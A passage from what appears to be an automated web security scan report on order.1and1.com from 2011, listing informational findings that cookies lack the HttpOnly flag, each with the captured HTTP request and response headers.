The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=idGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:50:43 GMT; Path=/
ETag: 3dd7dc19c0118095f7d091fc8a56e2d8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24721


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.135. http://order.1and1.com/xml/order/Server

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=66655d0aa462b000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Server;jsessionid=78C6B87E5A15AD5EF5A69765C4874290.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.136. http://order.1and1.com/xml/order/Server

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.137. http://order.1and1.com/xml/order/ServerPremium

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 4ad2d8e7cdb21186fe994e75ac91e0f5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32407


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.138. http://order.1and1.com/xml/order/ServerPremium

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/ServerPremium HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=c9c91afabf3b400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium;jsessionid=734354D933F26155728283B4F90796F3.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.139. http://order.1and1.com/xml/order/Service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:34 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:51:41 GMT; Path=/
ETag: 061f57075175d32d050436bb2f2cadd9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18433


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.140. http://order.1and1.com/xml/order/Service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Service HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:27 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=39e0d7fe6aed5c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Service;jsessionid=F66505FF61FF7A0A0A2DEA57081E282A.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.141. http://order.1and1.com/xml/order/Sharepoint

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:25 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=581fa44293975c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Sharepoint;jsessionid=ADA7E1BA4729C77C2B7C450364513DA5.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.142. http://order.1and1.com/xml/order/Sharepoint

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:33 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:48:40 GMT; Path=/
ETag: 5de0f14c7355940110db8a760b729cda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25629


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.143. http://order.1and1.com/xml/order/TcSpecialOffers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TcSpecialOffers HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:35:56 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1e3836594d69800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TcSpecialOffers;jsessionid=821972D9CB5B2ECD2247E949E1706836.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.144. http://order.1and1.com/xml/order/TcSpecialOffers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TcSpecialOffers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:50:06 GMT; Path=/
ETag: b22950bae17c91bdd0f7a1640caa71a1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 22489


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.145. http://order.1and1.com/xml/order/TellAFriend

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TellAFriend HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:36:37 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7ed924d0b7cb6c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/TellAFriend;jsessionid=814CEBE489553A29B51D0D417D2FA61A.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.146. http://order.1and1.com/xml/order/TellAFriend

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/TellAFriend

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
